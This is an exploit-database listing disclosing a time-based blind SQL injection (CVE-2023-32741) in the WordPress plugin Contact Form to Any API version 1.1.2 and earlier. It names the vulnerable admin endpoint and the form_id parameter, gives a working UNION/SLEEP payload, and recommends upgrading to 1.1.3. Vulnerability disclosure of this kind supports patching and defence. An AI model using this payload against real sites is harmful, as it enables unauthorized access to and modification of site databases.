[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Contact Form To Any API 1.1.2 SQL Injection Vulnerability

Author
Arvandy
Risk
[
Security Risk High
]
0day-ID
0day-ID-39147
Category
web applications
Date add
14-11-2023
CVE
CVE-2023-32741
Platform
php
# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/
# Vendor Homepage: https://www.itpathsolutions.com/
# Version: 1.1.2 
# Tested on: Windows, Linux
# CVE: CVE-2023-32741

# Product Description
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.

# Vulnerability overview
The Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.

# Proof of Concept
Affected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=
Affected Parameter: form_id
payload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -

# Recommendation
Upgrade to version 1.1.3

#  0day.today [2024-07-07]  #